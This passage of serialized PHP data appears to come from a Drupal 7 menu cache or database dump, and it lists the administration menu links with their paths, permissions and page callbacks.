pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:5:{i:30;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"30\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:21:\"admin/structure/block\";s:11:\"router_path\";s:21:\"admin/structure/block\";s:10:\"link_title\";s:6:\"Blocks\";s:7:\"options\";s:129:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:79:\"Configure what block content appears in your site\'s sidebars and other regions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:19:\"block_admin_display\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"bartik\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:6:\"Blocks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:79:\"Configure what block content appears in your site\'s sidebars and other regions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:36;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"36\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:21:\"admin/structure/types\";s:11:\"router_path\";s:21:\"admin/structure/types\";s:10:\"link_title\";s:13:\"Content types\";s:7:\"options\";s:142:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:92:\"Manage content types, including default status, front page promotion, comment settings, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"36\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer content types\";}\";s:13:\"page_callback\";s:19:\"node_overview_types\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/structure/types\";s:5:\"title\";s:13:\"Content types\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:92:\"Manage content types, including default status, front page promotion, comment settings, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:47;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"47\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:20:\"admin/structure/menu\";s:11:\"router_path\";s:20:\"admin/structure/menu\";s:10:\"link_title\";s:5:\"Menus\";s:7:\"options\";s:136:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:86:\"Add new menus to your site, edit existing menus, and rename and reorganize menu links.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"47\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:18:\"menu_overview_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/structure/menu\";s:5:\"title\";s:5:\"Menus\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:86:\"Add new menus to your site, edit existing menus, and rename and reorganize menu links.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:57;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"57\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:24:\"admin/structure/taxonomy\";s:11:\"router_path\";s:24:\"admin/structure/taxonomy\";s:10:\"link_title\";s:8:\"Taxonomy\";s:7:\"options\";s:117:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:67:\"Manage tagging, categorization, and classification of your content.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"57\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"administer taxonomy\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:48:\"a:1:{i:0;s:30:\"taxonomy_overview_vocabularies\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:24:\"admin/structure/taxonomy\";s:5:\"title\";s:8:\"Taxonomy\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:67:\"Manage tagging, categorization, and classification of your content.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:363;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"363\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:23:\"admin/structure/contact\";s:11:\"router_path\";s:23:\"admin/structure/contact\";s:10:\"link_title\";s:12:\"Contact form\";s:7:\"options\";s:121:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:71:\"Create a system contact form and set up categories for the form to use.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:3:\"363\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer contact 